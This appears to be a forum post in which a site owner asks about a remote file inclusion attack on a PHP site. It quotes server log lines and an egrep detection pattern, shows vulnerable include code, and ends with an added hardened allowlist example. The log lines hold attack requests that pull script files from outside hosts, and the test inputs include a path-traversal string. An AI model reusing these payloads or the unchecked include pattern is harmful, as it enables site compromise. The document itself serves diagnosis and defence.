Yesterday my server suffered a SPAM attack; my provider informed me that my web site was vulnerable through its includes, which is why they could get in and sabotage everything.
They sent me this report.
Quote:
Apparently what they were doing: http://www.geocities.com/mmgroupcoy/baptist/baptist.txt
root@dime93 [/etc/httpd/conf]# egrep -E '.*(GET|POST).*=http:\/\/.*HTTP.*' /etc/httpd//domlogs/midominio.com.pe
81.199.61.109 - - [17/Oct/2006:22:50:09 -0400] "POST
/index.php?contenido=http://www.geocities.com/ubestagain/FMT.txt? HTTP/1.1" 302
368
"http://www.midominio.com.pe/index.php?contenido=http://www.geocities.com/ubestagain/FMT.txt?"
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
81.199.173.35 - - [17/Oct/2006:22:53:11 -0400] "GET
/index.php?contenido=http://www.geocities.com/ubestagain/FMT.txt? HTTP/1.0" 302
356 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
81.199.173.35 - - [17/Oct/2006:22:56:39 -0400] "POST
/index.php?contenido=http://www.geocities.com/ubestagain/FMT.txt? HTTP/1.0" 302
356
"http://www.midominio.com.pe/index.php?contenido=http://www.geocities.com/ubestagain/FMT.txt?"
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
81.199.173.35 - - [17/Oct/2006:22:57:04 -0400] "POST
/index.php?contenido=http://www.geocities.com/ubestagain/FMT.txt? HTTP/1.0" 302
356
"http://www.midominio.com.pe/index.php?contenido=http://www.geocities.com/ubestagain/FMT.txt?"
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
81.199.61.109 - - [17/Oct/2006:22:57:40 -0400] "POST
/index.php?contenido=http://www.geocities.com/ubestagain/FMT.txt? HTTP/1.1" 302
368
"http://www.midominio.com.pe/index.php?contenido=http://www.geocities.com/ubestagain/FMT.txt?"
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
81.199.61.109 - - [17/Oct/2006:23:06:34 -0400] "GET
/index.php?contenido=http://www.geocities.com/ubestagain/FMT.txt? HTTP/1.1" 302
368 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
81.199.173.35 - - [17/Oct/2006:23:08:24 -0400] "POST
/index.php?contenido=http://www.geocities.com/ubestagain/FMT.txt? HTTP/1.0" 302
356
"http://www.midominio.com.pe/index.php?contenido=http://www.geocities.com/ubestagain/FMT.txt?"
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
196.207.10.102 - - [17/Oct/2006:23:09:46 -0400] "GET
/index.php?contenido=http://www.geocities.com/ubestagain/FMT.txt? HTTP/1.1" 302
368 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Crazy Browser
1.0.5)"
81.199.173.35 - - [17/Oct/2006:23:41:29 -0400] "POST
/index.php?contenido=http://www.geocities.com/ubestagain/FMT.txt? HTTP/1.0" 302
356
"http://www.midominio.com.pe/index.php?contenido=http://www.geocities.com/ubestagain/FMT.txt?"
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
81.199.173.35 - - [17/Oct/2006:23:42:29 -0400] "POST
/index.php?contenido=http://www.geocities.com/ubestagain/FMT.txt? HTTP/1.0" 302
356
"http://www.midominio.com.pe/index.php?contenido=http://www.geocities.com/ubestagain/FMT.txt?"
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
81.199.173.35 - - [17/Oct/2006:23:45:40 -0400] "POST
/index.php?contenido=http://www.geocities.com/ubestagain/FMT.txt? HTTP/1.0" 302
356
"http://www.midominio.com.pe/index.php?contenido=http://www.geocities.com/ubestagain/FMT.txt?"
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
82.206.131.150 - - [17/Oct/2006:23:50:04 -0400] "POST
/index.php?contenido=http://www.geocities.com/aweleoh123/Douglas.txt? HTTP/1.1"
302 372
"http://www.midominio.com.pe/index.php?contenido=http://www.geocities.com/aweleoh123/Douglas.txt?"
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Crazy Browser 1.0.5)"
82.206.131.150 - - [17/Oct/2006:23:50:39 -0400] "POST
/index.php?contenido=http://www.geocities.com/aweleoh123/Douglas.txt? HTTP/1.1"
................there is still more of the same..............
I think almost the same thing happened to me once.
My code was:
PHP code:
<?php
$admin = $_GET["admin"] ;
if($admin == ""){
$admin="home";
}
?>
.............
<? include($admin.".php");?>
I look forward to your comments.
By the way, is what they did to me: phpscripting?
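A hardened form of the include shown in the post, as an added example that is not part of the original post or the poster's code: the `admin` request value is only used as a key into a fixed allowlist, so a URL like the ones in the provider's log never reaches `include`. The page names in `PAGES` and the helper `resolve_page()` are hypothetical.

```php
<?php
// Added example, not the poster's code. Page names below are hypothetical.

// Allowlist: the request value is only ever used as a lookup key,
// never concatenated into the path handed to include().
const PAGES = [
    'home'     => 'home.php',
    'contacto' => 'contacto.php',
    'admin'    => 'admin.php',
];

/**
 * Map the untrusted ?admin= value to a file listed in PAGES.
 * Anything not in the allowlist (remote URLs, ../ traversal, array
 * parameters, empty strings) falls back to the home page.
 */
function resolve_page($requested): string
{
    if (!is_string($requested) || !array_key_exists($requested, PAGES)) {
        $requested = 'home';
    }
    // The path is built only from constants defined in this file.
    return __DIR__ . '/' . PAGES[$requested];
}

// Constructed inputs; the first mirrors the request seen in the provider's log.
$samples = [
    'http://www.geocities.com/ubestagain/FMT.txt?',
    '../../etc/passwd',
    ['x'],
    '',
    'contacto',
];
foreach ($samples as $value) {
    $shown = json_encode($value, JSON_UNESCAPED_SLASHES);
    printf("%-48s => %s\n", $shown, basename(resolve_page($value)));
}

// In the real page the include then becomes:
//   include resolve_page($_GET['admin'] ?? 'home');
```

Only `contacto` resolves to its own file; every other sample falls back to `home.php`. Setting `allow_url_include = Off` in php.ini (available since PHP 5.2) is a useful second layer against remote URLs, but it does not stop local path traversal, so the allowlist is still needed.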